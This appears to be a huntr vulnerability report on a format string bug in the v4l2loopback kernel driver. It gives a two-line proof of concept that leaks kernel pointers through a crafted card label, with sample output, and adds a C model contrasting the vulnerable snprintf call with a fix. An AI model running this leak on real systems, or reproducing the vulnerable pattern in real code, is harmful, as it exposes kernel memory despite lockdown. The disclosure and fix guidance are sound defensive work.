huntr / benbe / 1B055DA5-7A9E-4409-99D7-030280D242D5
History: Jul 28, 2022 - 6:44 p.m.

Format string modifiers in card label

www.huntr.dev

EPSS: 0.0005 (Low), percentile 17.9%

Description

When a new video device is added with v4l2loopback-ctl and its card label contains format string conversion specifiers (for example %p), the kernel driver uses the label itself as the format string when it fills in the device name (as read back from sysfs) and answers capability queries. The specifiers are therefore interpreted inside the kernel, and the values they consume, kernel stack contents and pointers, are leaked to the caller in the resulting string.

Exploitation requires write access to /dev/v4l2loopback, the control device that v4l2loopback-ctl uses, which is owned by root:root with mode 0600 by default; on a stock installation an unprivileged user cannot trigger it. The leak still works on kernels booted in lockdown mode, which matters because lockdown is meant to stop even root from reading kernel memory through the usual debugging interfaces; this path goes through an ordinary driver ioctl instead.

Proof of Concept

v4l2loopback-ctl add -n "%p-%p-%p"
cat /sys/devices/virtual/video4linux/video2/name

(Use the device node that `add` prints in place of video2; /dev/video2 is just what it was on the reporter's machine.)

Output (example):

/dev/video2
00000000de899e9f-00000000f6d35a

Only two full pointers and a truncated third fit in the output: the V4L2 device name buffer is 32 bytes, so the expanded string is cut off at 31 characters. The exact values differ per boot.

Expected:

/dev/video2
%p-%p-%p
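The bug class above in isolation, as an added user-space model written for this page rather than code from the report or from v4l2loopback: a 32-byte name buffer (the size of the kernel's struct video_device.name) is filled once with the caller-controlled label used directly as the format string, which is the vulnerable pattern, and once with a fixed "%s" format, which is the fix. A small label check of the kind a tool such as v4l2loopback-ctl could apply before trusting a driver is included as a stopgap; its name and behaviour are an assumption of this example, not a feature of the real tool.

```c
/* Added example, not v4l2loopback code: models the card-label format
 * string bug in user space so the two code paths can be compared. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define V4L2_NAME_LEN 32 /* size of struct video_device.name in the kernel */

/* The compiler correctly warns about a non-literal format string; the
 * warning is silenced only so the vulnerable pattern can be demonstrated. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
/* Vulnerable: the label becomes the format string, so %p/%x conversions
 * consume arguments that were never passed (registers/stack garbage here,
 * kernel stack contents in the driver). */
static void set_name_vulnerable(char *dst, const char *label)
{
    snprintf(dst, V4L2_NAME_LEN, label);
}
#pragma GCC diagnostic pop

/* Hardened: the label is only ever data for a fixed "%s" format. */
static void set_name_hardened(char *dst, const char *label)
{
    snprintf(dst, V4L2_NAME_LEN, "%s", label);
}

/* True when the stored name equals the label verbatim, i.e. the
 * "Expected" result in the report. Labels of 32+ bytes are truncated by
 * both paths, so this comparison is only meaningful for short labels. */
static bool label_survives(void (*setter)(char *, const char *),
                           const char *label)
{
    char name[V4L2_NAME_LEN];
    setter(name, label);
    return strcmp(name, label) == 0;
}

/* Hypothetical guard for the user-space tool: reject any '%' that starts
 * a conversion, while still allowing a literal "%%". */
static bool label_has_conversion(const char *label)
{
    for (const char *p = label; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        return true;
    }
    return false;
}

int main(void)
{
    const char *label = "%p-%p-%p"; /* the reporter's PoC label */
    char name[V4L2_NAME_LEN];

    set_name_vulnerable(name, label);
    printf("vulnerable: %s\n", name); /* pointer-looking hex, as in the report */
    set_name_hardened(name, label);
    printf("hardened:   %s\n", name); /* %p-%p-%p, the expected output */
    printf("guard rejects label: %s\n",
           label_has_conversion(label) ? "yes" : "no");
    return 0;
}
```

The vulnerable path reads whatever the calling convention hands to a variadic function when no arguments were supplied, so its printed values are unpredictable and the call is technically undefined; that unpredictability is exactly the leak the report describes. The hardened path is the one-line change that removes the bug.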
